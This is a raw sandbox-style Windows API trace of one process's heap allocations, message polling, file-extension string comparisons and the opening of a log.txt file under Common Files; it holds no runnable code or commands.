dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0194.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0194.804] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0194.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0194.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0194.805] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0194.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0194.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0194.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0194.805] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0194.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0194.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0194.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0194.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0194.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0194.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0194.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0194.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0194.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0194.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.808] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.808] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0194.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0194.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.809] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0194.810] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0194.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0194.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0194.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0194.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x170) returned 0x907778 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0194.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0194.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0194.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0194.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0194.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0194.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0194.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0194.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0194.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0194.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0194.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0194.813] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0194.813] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.813] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0194.813] 